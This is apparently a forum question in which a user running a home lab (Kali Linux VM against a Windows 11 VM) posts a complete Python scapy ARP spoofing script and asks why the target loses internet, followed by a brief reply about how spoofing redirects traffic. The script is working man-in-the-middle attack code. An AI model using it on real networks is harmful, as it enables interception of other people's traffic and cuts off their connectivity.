ARP spoofing makes my Target Machine lose internet
This is my code, I have tried flushing ip tables and enabled port forwarding. I don't know what is wrong with this script, I have also turned firewall off from my windows VM(target machine). Don't know whats wrong with this, last time I checked it was working but now its not. I am using Kali Linux on a VM as the hacker machine and a windows 11 VM as the target machine. My laptop runs macOS.
import time
import scapy.all as scapy

# Get user inputs for target and router IPs
target_ip = str(input("Please enter the target machine's IP: "))
router_ip = str(input("Please enter the router's IP: "))

def get_mac(ip):
    """Get the MAC address for a given IP address using ARP."""
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast / arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    """Send spoofed ARP responses to the target IP."""
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet)

def restore(target_ip, router_ip):
    """Restore the original ARP tables of the target and router."""
    destination_mac = get_mac(target_ip)
    source_mac = get_mac(router_ip)
    if destination_mac and source_mac:
        packet = scapy.ARP(op=2, pdst=target_ip, hwdst=destination_mac, psrc=router_ip, hwsrc=source_mac)
        scapy.send(packet, count=4, verbose=False)

sent_packets_count = 0
try:
    while True:
        spoof(target_ip, router_ip)
        spoof(router_ip, target_ip)
        sent_packets_count += 2
        print(f"\r[+] Sent packets: {sent_packets_count}", end="")
        time.sleep(2)
except KeyboardInterrupt:
    print("\nQuitting the program...")
    restore(target_ip, router_ip) 

I have tried flushing the ip tables and enabling port forwarding, the code runs and it's able to ARP spoof correctly only problem is that the target machine looses network and can't access the web, how might I fix this?

if you spoof the ARP of some other machine, no one will be able to send to that machine because everything will go to you instead.

This seems more related to your expectations than anything in your code.
